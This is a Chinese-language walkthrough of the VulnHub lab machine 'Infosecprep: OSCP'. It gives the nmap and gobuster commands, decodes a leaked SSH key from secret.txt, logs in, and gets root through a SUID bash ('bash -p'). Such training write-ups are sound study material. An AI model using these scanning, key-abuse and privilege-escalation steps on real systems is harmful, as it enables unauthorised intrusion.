VulnHub靶机 | Infosecprep:oscp
2022-8-11 11:51:15 Author: 0x00实验室(查看原文) 阅读量:15 收藏

"满地都是六便士,他却抬头看见了月亮"


项目地址:

https://download.vulnhub.com/infosecprep/oscp.zip
本靶机比较适合新手

0x00.主机探测

sudo nmap -sP 192.168.33.1/24

确定目标IP为:192.168.33.131

0x01.端口服务探测:

sudo nmap -sC -sV 192.168.33.131 -oN oscp.nmap

0x02.访问80端口:

一个很经典的WordPress页面当然最重要的信息是only user for the box is “oscp”
这里有两种可能:1.指wordpress后台账户只有oscp,2.是这台靶机系统上只有ROOT和OSCP这两个用户

是一个 WordPress 的 cms ,
#看下是什么版本的cmseek -u http://192.168.33.131

0x03.目录遍历:

sudo gobuster dir -u http://192.168.33.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium

http://192.168.33.131/secret.tx

Base64解密:发现是SSH密钥

0x04.直接SSH链接:

ssh -i id_rsa oscp@192.168.33.131

0x05.提权:先拿一个完整的shell

python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ctrl + z stty -a stty raw -echo;fg reset stty rows x columns y

这个靶机不能使用这个,提权要用到现在通过 python 拿一个完整的 shell 就不行了.

guid =s 提权

find / -perm -u=s -type f 2>/dev/null

/usr/bin/bash -p whoami

0x06.提权成功:


参考资料:

https://blog.csdn.net/qq_44635376/article/details/113679933
https://www.cnblogs.com/takagisan/p/16253546.html

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5MDY2MTUyMA==&mid=2247488788&idx=1&sn=a4c2ff54134d5baffb296aea550fb028&chksm=cfd86aebf8afe3fd969ccf9f9aa1cc4d5701bb4df492373014aa52c657496ab6c45c53be42e5#rd
如有侵权请联系:admin#unsafe.sh